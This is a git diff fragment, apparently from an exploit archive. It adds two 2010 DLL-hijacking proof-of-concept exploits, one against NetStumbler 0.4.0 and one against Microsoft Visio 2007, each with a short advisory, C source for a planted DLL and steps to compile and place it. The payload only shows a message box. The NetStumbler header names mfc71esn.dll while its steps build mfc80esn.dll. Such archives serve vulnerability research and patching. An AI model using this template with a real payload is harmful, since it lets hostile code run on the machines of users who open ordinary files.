fdwReason, + LPVOID lpvReserved) + {mes();} + diff --git a/platforms/windows/remote/34831.c b/platforms/windows/remote/34831.c new file mode 100755 index 000000000..a3cc556c0 --- /dev/null +++ b/platforms/windows/remote/34831.c @@ -0,0 +1,45 @@ +source: http://www.securityfocus.com/bid/43913/info + +NetStumbler is prone to a vulnerability that lets attackers execute arbitrary code. + +An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file. + +NetStumbler 0.4.0 is vulnerable; other versions may also be affected. + +/* +========================================================= +NetStumbler - v0.4.0 DLL Hijacking Exploit (mfc71esn.dll) +========================================================= + +$ Program: NetStumbler +$ Version: 0.4.0 +$ Download: http://www.netstumbler.com/ +$ Date: 2010/10/08 + +Found by Pepelux +http://www.pepelux.org +eNYe-Sec - www.enye-sec.org + +Tested on: Windows XP SP2 && Windows XP SP3 + +How to use : + +1> Compile this code as mfc80esn.dll + gcc -shared -o mfc80esn.dll thiscode.c +2> Move DLL file to the directory where NetStumbler is installed +3> Open any file recognized by NetStumbler +*/ + + +#include +#define DllExport __declspec (dllexport) +int mes() +{ + MessageBox(0, "DLL Hijacking vulnerable", "Pepelux", MB_OK); + return 0; +} +BOOL WINAPI DllMain ( + HANDLE hinstDLL, + DWORD fdwReason, + LPVOID lpvReserved) + {mes();} diff --git a/platforms/windows/remote/34832.c b/platforms/windows/remote/34832.c new file mode 100755 index 000000000..c0e38d333 --- /dev/null +++ b/platforms/windows/remote/34832.c @@ -0,0 +1,45 @@ +source: http://www.securityfocus.com/bid/43914/info + +Microsoft Visio is prone to a vulnerability that lets attackers execute arbitrary code. + +An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file. + +Microsoft Visio 2007 is vulnerable; other versions may also be affected. + +/* +========================================================= +Microsoft Visio 2007 DLL Hijacking Exploit (mfc80esn.dll) +========================================================= + +$ Program: MS Visio +$ Version: 2007 +$ Download: http://office.microsoft.com/es-es/downloads/CH010225969.aspx +$ Date: 2010/10/08 + +Found by Pepelux +http://www.pepelux.org +eNYe-Sec - www.enye-sec.org + +Tested on: Windows XP SP2 && Windows XP SP3 + +How to use : + +1> Compile this code as mfc80esn.dll + gcc -shared -o mfc80esn.dll thiscode.c +2> Move DLL file to the directory where Visio is installed +3> Open any file recognized by msvisio +*/ + + +#include +#define DllExport __declspec (dllexport) +int mes() +{ + MessageBox(0, "DLL Hijacking vulnerable", "Pepelux", MB_OK); + return 0; +} +BOOL WINAPI DllMain ( + HANDLE hinstDLL, + DWORD fdwReason, + LPVOID lpvReserved) + {mes();}